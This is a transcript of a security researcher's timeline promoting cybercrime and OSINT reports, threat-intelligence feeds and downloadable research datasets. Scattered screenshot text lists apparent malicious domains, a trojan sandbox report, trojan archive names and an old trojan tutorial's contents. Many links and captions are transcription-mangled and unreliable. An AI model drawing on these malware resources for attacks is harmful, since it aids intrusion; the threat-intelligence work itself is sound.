Who wants to fight some bad guys? - Part Five - https://t.co/7Ro2JFDm8y #security 
#cybercrime #malware #CyberSecurity #cyberattacks #cybersecuritytips 
#threatintelligence #threatintel https://t.co/FqhUSpCDas 


21 *1
13:38 


Who wants to fight some bad guys? - Part Six - https://t.co/amDclOAEcg #security 
#cybercrime #malware #CyberSecurity #cyberattacks #cybersecuritytips 
#threatintelligence #threatintel https://t.co/qGxHPMvBNc 


=1-%1
13:39


Who wants to fight some bad guys? - Part Seven - https://t.co/SMDjSd2Jnb #security 
#cybercrime #malware #CyberSecurity #cyberattacks #cybersecuritytips 
#threatintelligence #threatintel https://t.co/aZgx9lIOm0x 


22 %*%5
13:40 


Thanks for the RT! @DaveMarcus Keep it up! #security #cybercrime #malware 
#CyberSecurity #cyberattacks #cybersecuritytips #threatintelligence #threatintel 


21 %1 
14:09 
@DaveMarcus Catch up! Catch up! - https://t.co/JTcqOaYgET | 
https://t.co/OmUajr8DT8 | https://t.co/sMWCGUWR6g | https://t.co/ZOwWW9r2oiV | 
https://t.co/eufoOwGUnb | https://t.co/nNsSXMPrGi0 | https://t.co/7GM1oNelIFK | 
https://t.co/uvAt5gK9BA | https://t.co/UZ6qVANXVF 


*1 
14:11 


Thanks for the RT! - @thierryzoller Keep up the good work! 


*1 
19:20 
Exclusive! - "Exposing GRU’s Unit 74455 "NotPetya" Malware Gang - An OSINT 
Analysis" - https://t.co/iEF7ysEg8F #security #cybercrime #malware #CyberSecurity 
#cyberattacks #cybersecuritytips #Threatintelligence #threatintel 


213 *28

27 - Monday


03:31 
@BushidoToken Psst! - https://t.co/oF82LfFNgE Here a link to the PDF - 
https://t.co/iEF7ysEg8F Enjoy! 
03:34 
@campuscodi Check this out! - https://t.co/oF82LfFNgE Here’s the PDF - 
https://t.co/iEF7ysEg8F Enjoy!
03:38 


RT pls! - "Exposing GRU’s Unit 74455 "NotPetya" Malware Gang - An OSINT Analysis" - 
https://t.co/iEF7ysEg8F #security #cybercrime #malware #CyberSecurity 
#cyberattacks #threatintel Here’s the original post - https://t.co/oF82LfFNgE Enjoy! 


21 *2 
03:51 
@NCSCgov Hello. Here’s my analysis - https://t.co/oF82LfFNgE and here’s the actual 
PDF of the campaign - https://t.co/iEF7ysEg8F Enjoy! 
03:51 
@a_greenberg Andy. Here’s my analysis - https://t.co/oF82LfFNgE and here’s the 
actual PDF of the campaign - https://t.co/iEF7ysEg8F Enjoy!
03:52 
@ESETresearch Hello. Here’s my analysis - https://t.co/oF82LfFNgE and here’s the 
actual PDF of the campaign - https://t.co/iEF7ysEg8F Enjoy! 
03:52 
@dnvolz Hello. Here’s my analysis - https://t.co/oF82LfFNgE and here’s the actual 
PDF of the campaign - https://t.co/iEF7ysEg8F Enjoy! 
03:52 
@jseldin @USTreasury Hello. Here’s my analysis - https://t.co/oF82LfFNgE and here’s 
the actual PDF of the campaign - https://t.co/iEF7ysEg8F Enjoy!
03:58 


Exposing GRU’s Unit 74455 "NotPetya" Malware Gang - An OSINT Analysis - 
https://t.co/iEF7ysEg8F [PDF] Original analysis here - https://t.co/oF82LfFNgE 
#security #cybercrime #malware #cyberattacks #cybersecuritytips 
#ThreatDetection #threatintel https://t.co/viQ8VZKSn9 
03:58


Exposing GRU’s Unit 74455 "NotPetya" Malware Gang - An OSINT Analysis - 
https://t.co/iEF7ysEg8F [PDF] Original analysis here - https://t.co/oF82LfFNqE 
#security #cybercrime #malware #cyberattacks #cybersecuritytips 
#ThreatDetection #threatintel https://t.co/LHzIljgOEn 


2 


03:59 


Exposing GRU’s Unit 74455 "NotPetya" Malware Gang - An OSINT Analysis - 
https://t.co/iEF7ysEg8F [PDF] Original analysis here - https://t.co/oF82LfFNgE 
#security #cybercrime #malware #cyberattacks #cybersecuritytips 
#ThreatDetection #threatintel https://t.co/NESZdb6jKp 
03:59


Exposing GRU’s Unit 74455 "NotPetya" Malware Gang - An OSINT Analysis - 
https://t.co/iEF7ysEg8F [PDF] Original analysis here - https://t.co/oF82LfFNqE 
#security #cybercrime #malware #cyberattacks #cybersecuritytips 
#ThreatDetection #threatintel https://t.co/C60oALiIDhTQ


*1 
dr.x@europe.com 
socks.pm autoupdater.biz 
03:59 
Exposing GRU’s Unit 74455 "NotPetya" Malware Gang - An OSINT Analysis - 
https://t.co/iEF7ysEg8F [PDF] Original analysis here - https://t.co/oF82LfFNgE 
#security #cybercrime #malware #cyberattacks #cybersecuritytips 
#ThreatDetection #threatintel https://t.co/NzYcoGyD1H
*1 


am andabuilderam a@m ail.com presmike2034@msn.com 
m inisternetwork.org 
03:59


Exposing GRU’s Unit 74455 "NotPetya" Malware Gang - An OSINT Analysis - 
https://t.co/iEF7ysEg8F [PDF] Original analysis here - https://t.co/oF82LfFNgE 
#security #cybercrime #malware #cyberattacks #cybersecuritytips 
#ThreatDetection #threatintel https://t.co/d13q9FMs36 


*1 
contact_r.zeteny@keem ail.me 
um 10eset.net as23-updater-sym antec.org
07:18 


Shots from the Wild West - Random Cybercrime Ecosystem Screenshots 2021 - An 
OSINT Analysis - https://t.co/ZWqUX501GK #security #cybercrime #malware 
#CyberAttack #CyberSecurity #cybersecuritytips #ThreatHunting #Threatintel 
#ThreatDetection 


07:18 


Shots from the Wild West - Sample Compilation of RATs (Remote Access Tools) and 
Trojan Horses Screenshots - An OSINT Analysis - https://t.co/ZqPPhotnDD #security 
#cybercrime #malware #cybersecuritytips #ThreatHunting #Threatintel 
#ThreatDetection 


08:09 
@mikko My take on the incident - https://t.co/oF82LfFNqE PDF analysis here - 
https://t.co/iEF7ysEg8F
09:25 


Anyone hiring in Europe? Here’s my CV - https://t.co/04zpbx2RSb and here’s the 
original post - https://t.co/GrQah7NmDP #security #cybercrime #malware 
#ThreatHunting #Threatintel #threatintelligence 


12:04 
Exposing an Indian Police Spyware Cyber Operation that Fabricated Evidence on the 
PCs of Indian Activists - An OSINT Enrichment Analysis - https://t.co/qifV9RLH4A 
#security #cybercrime #malware #ThreatHunting #Threatintelligence CC: 
@a_greenberg 

28 - Tuesday
08:41 


https://t.co/AZAws4uoos #security #cybercrime #malware #Threatintelligence 


#Threatintel #threathunting 


29 - Wednesday 
09:28 


Who's online interested and has the threat intelligence OSINT and cyber threat actor 
attribution experience and the necessary time including SharePoint and Microsoft 
Access experience and wants to work with me on a collaborative database of bad 

guys? https://t.co/QRzhOrMp3} 


21 %1 


[Screenshot of a database form: Global Intelligence - Web Site Defacements: Group Name, Hacker Handle, Official Defacer Web Site, Compromised Site URL]
09:30


What we need is a set of experienced and knowledgeable folks to work with me that 
also can dedicate free time for the project to discuss and build the initial taxonomy 
for the project. Don’t forget the beer will be on me when we go public with the 
project. https://t.co/6hbtRXRdUK 
09:33


Anyone who’s into OSINT on the bad guys including threat intelligence and threat 
actor attribution and has free time can DM me or drop me a line at 
dancho.danchev@hush.com to discuss and work on the actual data entry and the 
initial taxonomy. https://t.co/uBHcO66U6z 
[Screenshot of the database taxonomy: Affected Company, Affected Country, Malware, Malware Name, Malware Description, Malware Author, Malware Group, MD5, SHA256, Command and Control]

What we need at the beginning is experienced folks who can work on the taxonomy 
and at a later stage the actual data entry work in everyone’s free time. Are you 
interested? DM me or drop me a line at dancho.danchev@hush.com Let’s make it 
happen! https://t.co/teQ9vsTNUNV 
09:38


I just grabbed Microsoft Access and SharePoint access and I hope that you can 
dedicate the time to assist in the initial taxonomy development and then the actual 
data entry in your free time. RT pls or DM or drop me a line at 
dancho.danchev@hush.com. https://t.co/3pYeGN2fzP 


I envision this as a Windows Application with daily or weekly updates where we can 
eventually introduce an API and let other users use and enrich our information in 
their research. RT pls DM or drop me a line at dancho.danchev@hush.com 
https://t.co/bWfy53UBce 
10:30


My latest white paper for @whoisxmlapi - https://t.co/uvLZNkbnBd #Threatintel 
#threathunting 


*1 
11:42 


Dear @MalwarePatrol what’s the easiest way to send you an email or can you DM me 
here? Regards. Dancho 
18:07 


The Koobface Gang Makes a Comeback - An In-Depth OSINT Enrichment Analysis in 
2022 - https://t.co/2X6tUKSG42 #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cyberattacks #ThreatIintel #Threatintelligence 
https://t.co/lu8diq9geA 

30 - Thursday


03:49 


Who has a valid Maltego license free time OSINT capabilities and want to jump in with 
me for a collaborative session and do some research? DM or reply. For starters here’s 
a direct link to my Maltego SNA of Iran’s Hacker scene - https://t.co/6NOvD45fM8 
https://t.co/OTWPgeKkOt 

July


1 - Friday 
06:18 


My latest white paper for @whoisxmlapi - https://t.co/80QjniS8sn #Threatintelligence 
#Threatintel 


2l 


06:32 


Happy searching! - https://t.co/Teu6CSTcR) I’ve just launched my search engine for 
hackers security bloggers OSINT analysts and threat intelligence analysts which is a 
project that I intend to continue maintaining with high quality resources. Enjoy! 
https://t.co/fqsk33SCdr 
[Screenshot: Cyber Security OSINT and Threat Intelligence Search Engine]


08:16 


My latest white paper for @whoisxmlapi - "An In-Depth OSINT and Technical Cyber 
Attribution Analysis of Cytrox’s Predator Lawful Surveillance Malicious Software - An 
OSINT Analysis " - https://t.co/AS5vK13c8U Enjoy! 


21 *%4 
13:32 
@GirlsCanInvest2 Just followed you back. Feel free to DM me. Regards. Dancho 


18:50 


https://t.co/nZhOtkTGh] #security #cybercrime #malware #ThreatIntelligence 
#threatintel 


6 - Wednesday 


13:23 


Stay tuned for the Second Edition of my Cyber Intelligence Memoir which will be 
made exclusively available in Bulgarian. Grab the first edition here - 
https://t.co/qLxz4GuRip [PDF] or at @Cryptome_org - https://t.co/6V8O0FTdlSv [PDF] 
Stay tuned! https://t.co/B80Ir5H6RK 
13:25


Time to Say Goodbye! - https://t.co/53IQDfirtL #security #cybercrime #malware 
#cybersecurity #CyberAttack #CyberSecurityAwareness #ThreatHunting 
#Threatintelligence 

8 - Friday


12:43 


Stay tuned! Grab the first version from here - https://t.co/qLxz4GuRip 
https://t.co/mob5nasRg3 

14 - Thursday


02:00 
My latest white paper for @whoisxmlapi - https://t.co/qOyv9cv2GZ Enjoy! 


02:03 


I have just published the second edition of my memoir "Cyber Intelligence" which 
is in Bulgarian and which you can download here - https://t.co/Md62bupaj9 [PDF] 
as well as an audio book which you can download from here - https://t.co/zrqg1SmIrf [MP3] 
Regards! Dancho. https://t.co/T6XdIEqxUh 

Grab a copy of my latest E-book memoir in Bulgarian from here including the actual 
audio book for free from here - https://t.co/TcRUHAMAIY Enjoy! #security #cybercrime 
#malware #Threatintelligence #ThreatHunting #Threatintel https://t.co/HzBeSBfwwB 
10:49


My latest white paper for @whoisxmlapi - https://t.co/mjzvh5Rr66 Enjoy! #security 
#cybercrime #malware #Threatintelligence 


21 *%2 

12:35 

In the countryside in Bulgaria. #security #cybercrime #malware #Threatintelligence 
https://t.co/6HqsluaJUn 

15 - Friday


13:08 


Who wants access to my STIX/STIX2/TAXII feed? Check out the home page here - 
https://t.co/OmUajqR2uy a sample Conti #ransomware IoCs in STIX format - 
https://t.co/HiYrrilfRaH and drop me a line at dancho.danchev@hush.com in case you 
want GUI access. Enjoy! https://t.co/v4tCW5CmKs 
14:08
https://t.co/neqeZDCmc7 #security #cybercrime #malware #cyberattacks 
#cybersecurity #CyberAttack #ThreatHunting #Threatintelligence 
14:13 
https://t.co/jQkJq6fJgm #security #cybercrime #malware #cyberattacks 
#cybersecurity #CyberAttack #ThreatHunting #Threatintelligence 
14:13 
https://t.co/MW9HpiCxAB #security #cybercrime #malware #cyberattacks 
#cybersecurity #CyberAttack #ThreatHunting #Threatintelligence 
14:18 
https://t.co/nNsXMPa4Tq #security #cybercrime #malware #cyberattacks 
#cybersecurity #CyberAttack #ThreatHunting #Threatintelligence 
14:20 
https://t.co/TjmRcm6G4] #security #cybercrime #malware #cyberattacks 
#cybersecurity #CyberAttack #ThreatHunting #Threatintelligence 
14:21 


https://t.co/uvAt5h1kKt8 #security #cybercrime #malware #cyberattacks 
#cybersecurity #CyberAttack #ThreatHunting #Threatintelligence 


*1 
14:22
https://t.co/39JWq8cJDL #security #cybercrime #malware #cyberattacks 
#cybersecurity #CyberAttack #ThreatHunting #Threatintelligence 
14:36 


Takes you back doesn’t it? - https://t.co/JByl930BiK Interview here - 
https://t.co/W6I8KSHY7B [MP3] Here’s the latest - https://t.co/2X6tUKB4Fs ; 
https://t.co/AZAws4LZg0 Enjoy! #ThreatHunting #ThreatIntelligence 


14:49 


Folks. Grab a free direct download of my Cybercrime Forum Data Set for 2021 which 
is 98GB here - https://t.co/jSWJywedIX and feel free to drop me a line at 
dancho.danchev@hush.com just to say "hi" or in case you’re hiring contractors. 
Regards. Dancho https://t.co/fD7vcbYA0O 
14:51


Folks. I guess I’m "keeping it coming". Here’s a direct download link for my 
Cybercrime Research USB Compilation which is 78GB - https://t.co/IdtK35i5Te Enjoy 
and drop me a line at dancho.danchev@hush.com in case you’re hiring contractors. 
Regards. Dancho https://t.co/rVc9WGCUnlI 
14:56


Folks. Here’s a direct download link for my compilation of source code and tools 
obtained using technical collection for research purposes - https://t.co/NgagnWj86a 
enjoy and drop me a line at dancho.danchev@hush.com in case you’re hiring 
contractors. https://t.co/snZfubfUiW 
14:57


Who needs or wants fresh and raw information on Iranian Cyber Threat actors in the 
form of crawled personal Web sites for research and data mining purposes including 
OSINT and technical collection enrichment? Here’s the link - https://t.co/VtdZPcd1dJ 
https://t.co/NAnFXkCsV5 
15:00


Here’s a direct download link on Part Two of my Iranian Cyber Threat Actors OSINT 
and data mining research compilation - https://t.co/7Ro2JFIKJY Enjoy and drop me a 
line at dancho.danchev@hush.com in case you're hiring contractors. Regards. 
Dancho https://t.co/NrEgQzUuOqO 
15:03


Who needs free access to fresh and recently processed 230 pages report on various 
international cyber threat actors? Here’s the link - https://t.co/SMDjScL7YB Enjoy! 
Drop me a line at dancho.danchev@hush.com in case you're hiring contractors. 
Regards. Dancho https://t.co/peg27bFKe5 

18 - Monday


05:18 


At the seaside in Bulgaria. Vacation time has come! I'll be back online in full speed in 
terms of research on Thursday. Stay tuned! #security #cybercrime #malware 
#CyberAttack #cyberattacks #cybersecuritytips #Threatintelligence #Threatintel 
#threathunting https://t.co/n6CoOCiP7n 
15:06


Celebrating my mother’s birthday anniversary at Bulgaria’s seaside. I'll be back full 
time online in terms of research on Thursday. Stay tuned! #security #cybercrime 
#malware #CyberSecurity #CyberAttack #cyberattacks #Threatintel 
#Threatintelligence https://t.co/2vTY2tiDIO 
15:52


Who wants to join me in a public XMPP/Jabber Conference Room where I intend to 
host live Q&As in terms of my research and offer general OSINT/cybercrime 
research/security blogging/threat intelligence analysis? - https://t.co/qOjVJPBkKWU 
https://t.co/HTVrkxxG7I 
15:57


ANPP 


Folks. Is anyone using SilentCircle? What’s your user ID? Regards. Dancho 
https://t.co/y4111j4f4c 


16:10 


Anyone using Threema? What’s your user ID? Regards. Dancho 
https://t.co/CD14V744sb 


2 


16:39 

https://t.co/TcRUHAMAIY #security #cybercrime #malware #CyberAttack #CyberSec 
#Threatintel #threathunting #threatintelligence 

16:48 


My latest white paper for @whoisxmlapi - https://t.co/PTpyyXmafo #security 
#cybercrime #malware #CyberAttack #CyberSec #Threatintel #threathunting 
#threatintelligence 

19 - Tuesday


05:41 


Awesome! I'll be back on Thursday in terms of research. Stay tuned! 
https://t.co/1LBAdrIWAWG 


09:15 
Check out my latest white paper for @whoisxmlapi. Enjoy! https://t.co/ovUsIENHXh 


09:16 
Check out my latest white paper for @whoisxmlapi. Enjoy! https://t.co/OHiBndMRfu 


21 - Thursday 


09:14 


My latest white paper for @whoisxmlapi - https://t.co/A9ePkKOUNCf #security 
#cybercrime #malware #CyberSecurity #CyberAttack #cybersecuritytips 
#CyberSec #CyberSecurityAwareness #cyber_security #ThreatHunting #threatintel 
13:14


Anyone hiring security bloggers? #security #cybercrime #malware #CyberSec 
#CyberAttack #cyberattacks #CyberSecurityAwareness #ThreatHunting 
#threatintelligence #threatintel 


22 - Friday 


00:17 


At the seaside. Bear with me. I’m coming back online full time tomorrow in terms of 
research. Regards. Dancho https://t.co/gUtt4JLGAp


02:46 


My latest white paper for @whoisxmlapi - https://t.co/QCnBUhWvzsS #security 
#cybercrime #malware #CyberAttack #cyberattacks #CyberSec #cybersecuritytips 
#CyberSecurityAwareness #ThreatHunting #threatintelligence #threatintel 


09:20 
Happy Friday! https://t.co/ZjYR3xAN32 

23 - Saturday


10:59 


Cheers! https://t.co/VkKBZxOc2PN 

24 - Sunday


07:11 


Did you know that Bruce Starling quoted me once - "Speaking of which: whatever 
happened to Dancho Danchev? Bulgarian white-hat ultra-hacker just kinda 
evaporates without a word? No return address for Dancho? What gives with that?" - 
https://t.co/JFJSQEBnf} 


26 - Tuesday 


10:07 


New post - "Basics of OSINT in the Context of Fighting Cybercrime - The Definite 
Beginner’s Guide" - https://t.co/48TOCtxtLN #security #cybercrime #malware 
#ThreatHunting https://t.co/kCdTvuwSLE


Figure 2. Intelligence Discipline Integration 


27 - Wednesday 


23:21 


My latest white paper for @whoisxmlapi - https://t.co/SR5ivFuhrb #security 
#cybercrime #malware #ThreatHunting #Threatintelligence #Threatintel 


29 - Friday 


06:13 


https://t.co/n6LihftIm3 #security #cybercrime #malware #ThreatIntelligence 
#Threatintel https://t.co/O2CIYVWPJO 
Welcome to the community-driven and commercial WhoisXML API 
OpenCTI instance where we aim to offer a novel and unique peek 
inside the modern threat landscape on a daily basis through the 
machine-readable communication of novel attack techniques 
including TTPs (Tactics Techniques and Procedures) including all 
the relevant and real-time processed IoCs (Indicators of 
Compromise) for current and ongoing cyber attack campaigns and 
currently circulating malicious software spam and phishing 
campaigns spreading rogue and fraudulent online campaigns. 
Inquire about your API key here - 
https://threat-intelligence.whoisxmlapi.com/nautilus-feed or send a message to 
research@whoisxmlapi.com


06:13 


https://t.co/n6LihftIm3 #security #cybercrime #malware #Threatintelligence 
#Threatintel https://t.co/oqzIROXSFk 
06:13


https://t.co/n6LihftIm3 #security #cybercrime #malware #Threatintelligence 
#Threatintel https://t.co/TUjwYFXjjo 


High Risk Trojan 
Scan Bypass Configuration Cloud Query, AV Scan 
» More Details 

» Behavior Summary 
This file dropped files 
This file deleted files 
This file had no window or its main window is hidden 
This file applied autostart registry modifications to start itself automatically 
This file spawned process(es) 

» Analysis Details 
Packer N/A 
File Type exe 
Downloaded From unnamed _collection_09 zip/412/2cb48629 3af74d169dac5aa09e0c779e~ 
Captured Packets | Original File | Tracer Package | Tracer Log 

» Suspicious Behaviors (4) 
Executable drop a copy of itself 
Suspicious file installed in system folder 
Suspicious registry 
The executable tries to inject a PE image to other processes 
» Code Emulation (1) 
» Files Created (7) 
» Files Deleted (4) 
» Launched Processes (3) 
» Registry Changes (1)


06:13 


https://t.co/n6LihftIm3 #security #cybercrime #malware #Threatintelligence 
#Threatintel https://t.co/Y514jfAyl6 

August


1 - Monday 


10:05 


https://t.co/tW2LuSxdSi [PDF] #ThreatHunting #ThreatIintelligence #Threatintel 
https://t.co/2NuwUri96G 

9 - Tuesday


09:36 


https://t.co/JT676NfPZI [PDF] #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #CyberSecurityAwareness #cyberwar #ThreatHunting 
https://t.co/NuipVoECfU 
12:42


Psst - it appears that I’ve been unknowingly doing hunt forward missions for the U.S 
since practically the beginning of all time. Stay tuned! - https://t.co/JTcqOaYgET 
#security #cybercrime #malware #CyberAttack #cybersecuritytips 
#Threatintelligence https://t.co/WqwMSbyrue 


12:54 


You know you’re popular when they say "hi". - https://t.co/mQWkOSpiqY 
https://t.co/h5WQkzg4Wh 
¥ Bulk Register 3 payment OT27/72008 08 © Stet apply fee soxbesuty net
¥ List My Domains 4 payment OT 27/2008 7.99 net domain registration fee scxbesuty net 
¥ Get Auth-Code 5 payment o7N7/2007 7.49 Doman Renewal Fee dstat org 
¥ Registrar Transfer 
6 Sepose 07/17/2007 25.0 e-banking wanster from bank 
¥ Account Transfer 
¥ ONS-OIY 7 payment 07/17/2007 073 payment processing tee ec 
¥ Add Funds & payment 07/17/2007 7 Doman Renewal Fee jabd.org 
¥ © Shield s payment 0312/2007 499 © Sheu apply fee ronnetwork com 
¥ Order SSL Cent 10 payment 03132007 4.99 O Shietd apply fee akimen.com 
¥ Domain Monetining Service 
apni M2 poges totst:11 records [725] (FB (os) 
Check Doman FAQ Suanort Wheis Helpdesk What's New a 


Forose 


12:57 
https://t.co/ozDt3GP916 https://t.co/fBrZ8E7nf5 


[Screenshot: Bulgarian-language tweet from DANS.bg (@dansbg) mentioning @PavlikMorozovBG and @svetlinco, and a notification that DANS.bg added the account to a list]


12:58 
https://t.co/ozDt3GP916 https://t.co/X4xFaduiTz 
@dansbg


Account suspended 


Twitter suspends accounts which violate the Twitter 
Rules. Learn more 


12:58 
https://t.co/ozDt3GP9l6 https://t.co/JqGQk9h9Tz 
[Screenshot: Bulgarian-language tweet dated Nov 25, 2009, addressed to @tsvetanov @cvetanov @ceco and mentioning @dansbg]
12:58 


https://t.co/ozDt3GP916 https://t.co/YivtUJojnw 
13:00 

[Screenshot: Bulgarian-language tweets posted from the web between Oct 16th and Oct 26th, including replies to @boiko, @komitata, @sergeystanishev, @tsetska and @bibliata, and referencing jobs@dans.bg and http://dans.bg]


https://t.co/JTcqOaYgET https://t.co/zqNcljq|ljf 
EXPOSING KOOBFACE: THE 
WORLD'S LARGEST BOTNET 
DANCHO DANCHEV


13:00 


https://t.co/JTcqOaYgET https://t.co/ttddrkt7mP 
Dancho Danchev Presents! Brace Yourselves! 

Grab today a free copy of the Second Free. 
Exposing Iran's Hacking Scene OSINT-Enabled and 
Technical Collection Empowered and Visualized Report! 
Priced at $500 for an Unlimited Distribution Among Your 
Organization including Individual Researcher Use - This is 
the Most Comprehensive and Technically Sophisticated 
Analysis of Iran's Hacking Scene Up-to-Date! 

Commercial Copy Available! Approach me today! 
Approach your Manager today! Empower your Threat 
Intelligence Team! An OSINT Conducted Today Is a 
Tax Payers Dollar Saved Tomorrow! 
https://ddanchev.blogspot.com 
Official OSINT Report Price - $500 

Technical Collection Data - Exclusive Copy Available! 
Email: dancho.danchev@hush.com


13:00 
https://t.co/JTcqOaYgET https://t.co/GYEbexUH7t
ZDNet

Ryan Naraine, Dancho Danchev & Adam O'Donnell

ZDNet Must Read:
Code execution flaws haunt OpenOffice
The flaws, which affect all versions prior to OpenOffice.org 2.4.2, could be exploited via manipulated WMF and EMF files in StarOffice or StarSuite documents

October 30th, 2008
Happy 20th birthday, internet worm!

This weekend marks the 20th anniversary of the Internet Worm, the first major worm that propagated on the Internet. Even though many years have passed and underlying media has changed, worms are still able to wreak havoc and keep system administrators up at night. Today the damage done by worms is far less visible and far less newsworthy but far more difficult to repair than in the past

Read the rest of this entry »

October 30th, 2008
Phishers apply quality assurance, start validating credit card numbers


13:01 
https://t.co/JTcqObfRwr https://t.co/h36qHII233
13:01


https://t.co/JTcqOaYgET https://t.co/vWtVRdAf2}
13:01


The Complete Trojans Text (Security Related)
by tHe MaNiAc
Written On 3.04.2000
contact me at: themaniac@blackcode.com
maniac@forbidden.net-security.org

This guide is for educational purposes only I do not take any responsibility about anything happen after reading the guide. I'm only telling you how to do this not to do it. It's your decision. If you want to put this text on your Site/FTP/Newsgroup or anything else you can do it but don't change anything without the permission of the author. I'll be happy to see this text on other pages too.

All copyrights reserved. You may distribute this text as long as it's not changed.

Author Notes:

I hope you like my texts and find them useful.
If you have any problem or some suggestion feel free to e-mail me but please don't send mails like "I want to hack the US government please help me" or "Tell me how to blind a trojan into a .jpg" "Where can I get a portscanner" etc......
Be sure if I can help you with something I will do it.
I've started writing security related tutorials and I hope you like that. I'll try to cover much more topics in my future texts and I want to thank to all of the people that like my texts.

Here you can find other texts written by me or other friends:
http://www.blackcode.com
blacksun.box.sk
neworder.box.sk

1.What Is This Text About?
2.What Is A Trojan Horse
3.Trojans Today
4.The future of the trojans
5.Anti-Virus Scanners
6.How You Can Get Infected?
----- From Attachment
----- From Physical Access
----- From Trick
7.How Dangerous A Trojan Can Be?
8.Different Kinds Of Trojans
----- Remote Access Trojans
----- Password Sending Trojans
----- Keyloggers
----- Destructive Trojans
----- FTP Trojans
9.Who Can Infect You?

900 


13:01
https://t.co/JTcqOaYgET https://t.co/PHulGz07pxX 


GRIEFER 


OW, oon 
SUCK MY DICK 


13:01 
https://t.co/JTcqOaYgET https://t.co/Vz30KggdOx
13:02


https://t.co/JTIcqOaYgET https://t.co/35aYPohZ23
13:10


Parent Directory
Cyn1.2.zip
Fri.55lite.zip
Fri.56lite.zip
Gift2.1.1.zip
Homeunix1.0.zip
Honeypoti.1.zip
MantisBeta2.zip
Metal2.7.zip
Olive2.4.zip
OptixGW.zip
input.rar
nerte722.rar
nerte733.rar
nerte74.rar
nerte75.rar
ptakks21.exe
rembomb.rar
revengor.rar
rnsfire.zip
rnstick.zip


https://t.co/JTcqOaYgET https://t.co/LrSIWVEMIY 


Psychofiles1.8.zip
fatalconnection20.rar
rnsuploadtrojan.zip
skyrat.rar

17-Apr-2002 13:06 -
05-Dec-2001 15:44 124k
05-Dec-2001 15:55 207k
05-Dec-2001 15:56 50k
05-Dec-2001 16:02 314k
05-Dec-2001 16:04 224k
05-Dec-2001 16:08 185k
05-Dec-2001 16:09 128k
05-Dec-2001 16:11 211k
05-Dec-2001 16:25 145k
05-Dec-2001 16:25 35k
05-Dec-2001 16:28 623k
05-Dec-2001 16:00 734k
05-Dec-2001 16:09 2k
05-Dec-2001 16:15 798k
05-Dec-2001 16:23 798k
05-Dec-2001 16:57 1.1M
05-Dec-2001 17:12 1.1M
05-Dec-2001 16:31
05-Dec-2001 16:32 10k
05-Dec-2001 16:36 192k
05-Dec-2001 16:36 11k
05-Dec-2001 16:37 131k
05-Dec-2001 16:38 11k
05-Dec-2001 16:44 362k


Dancho Danchev's Blog - Mind Streams of Information Security Knowledge

[Chart: Views, Jan 2011 to Jan 2019; 9.36M]

23:15
https://t.co/TCcRUHAMAIY https://t.co/ARAqV3Mmtf

[Image with Bulgarian-language text; the text is not recoverable]


17 - Wednesday 


07:10 
Chilling out. https://t.co/(MMm2IlpNOO
23:14


https://t.co/qLxz4GuRip [English PDF] https://t.co/kjEQQOvQGc [Bulgarian PDF] 
https://t.co/P9AfFAOWVQgxX [Audio Book in Bulgarian MP3] https://t.co/YwOcYe3ZnO 


*1 


Cyber 


Intelligence 


The Definite Cybercrime and Web 2.0 Memoir 
Courtesy of Dancho Danchev 
The RBN, The Koobface Botnet, The Rock Phish Gang, 
Spam Phishing and Malware Campaigns Including Botnet 
and Money Mule Recruitment Scams Traced Down to Their 


Source Including Various Underground Market Propositions 
Exposed 


https://ddanchev.blogspot.com 


Dancho Danchev 


19 - Friday 


08:20 


Cheers to all my friends and colleagues internationally. Keep up the spirit and try to contribute for a better good. I have several big projects and initiatives coming my way so stay tuned and catch up at https://t.co/JTcqObfRwr Stay tuned! #threatintel https://t.co/UrAGSEo22L


*1
24 - Wednesday


04:49 


https://t.co/JTcqOaYOur https://t.co/vjtZFqSijB
04:49


https://t.co/JTcqObfRwr https://t.co/cP58JaVi9s
04:49


https://t.co/JTcqObfRwr https://t.co/MNG60va9m2
Background

I was born in Sofia, Bulgaria. My primary area of occupation since the early 90's is computers. My — work is Disruptive individual's Chief Executive Officer (CEO)

Dancho Danchev Executive BIO

WarIndustries - Member
BlackCode Ravers - Member
Black Sun Research Facility - Contributor
DiamondCs - List Moderator/Software Contributor
LockDownCorp - Help Trojan Database Contributor
Forbidden HelpNetSecurity - Contributor
Astalavista Security Group - Managing Director
Frame4 Security Systems - Contributor
TechGenix - WindowSecurity - Contributor
ZDNet Zero Day - Security Blogger
Webroot Threat Blog - Security Blogger

Conference and Events - Media and Press Coverage

Dancho Danchev is the world’s leading expert in the field of cybercrime fighting and threat intelligence gathering having actively pioneered his own methodology for processing threat intelligence leading to a successful set of hundreds of high-quality analysis and research articles published at the industry's leading threat intelligence blog - ZDNet's Zero Day, Dancho Danchev's Mind Streams of Information Security Knowledge and Webroot's Threat Blog with his research featured in Techmeme, ZDNet, CNN, PCWorld, SCMagazine, TheRegister, NYTimes, CNET, ComputerWorld, H+Magazine currently producing threat intelligence at the industry's leading threat intelligence blog - Dancho Danchev's - Mind Streams of Information Security Knowledge

With his research featured at urope, Camp, InfoSec, GCHQ and Interpol the researcher continues to actively produce threat intelligence at the industry's leading threat intelligence blog - Dancho Danchev's - Mind Streams of Information Security Knowledge publishing a diverse set of hundreds of high-quality research analysis detailing the malicious and fraudulent activities at nation-state and malicious actors across the globe

09:22 
https://t.co/JTcqOaYOur https://t.co/Pn4baJUop5
09:23


https://t.co/JTcqObfRwr https://t.co/vV6Sr0eRgE
09:29


https://t.co/JTcqObfRwr https://t.co/rfNwZSZiPc
09:30
I used to cook in a previous life. Check these out! https://t.co/mlezNL2mq0O


*1
09:33


https://t.co/3OEtozirl3 https://t.co/fHwRCfJA0d
09:33


https://t.co/3OEtoyJi6V https://t.co/JXTvjljGsV


09:36 
https://t.co/JTcqOaYOur https://t.co/Y84TdFZjuh 


Other details

Analysis of the file resources indicate the following possible country of origin:

Russian Federation

The HOSTS file was updated with the following URL-to-IP mappings:

All content (“Information”) contained in this report is the copyrighted work of Threat Expert Ltd and its associated companies (“ThreatExpert”)

ThreatExpert
09:37
https://t.co/JTcqOaYOur https://t.co/tnTFpTNRNI 


*1 
DDanchev 
Rained 
On My 
Scareware 
Campaign 
09:40 


https://t.co/JTcqOaYOur https://t.co/8sCpnzx9c3
09:49
https://t.co/JTcqObfRwr https://t.co/iqodJBjJ6Nk
09:54
https://t.co/JTcqObfRwr https://t.co/WZIBKu6fk2
LOVELY HORSE
@lovelyhorse

322

https://t.co/JTcqObfRwr https://t.co/omSFVBWD19
09:54


09:54
https://t.co/JTcqObfRwr https://t.co/McThMmmHaT
09:54


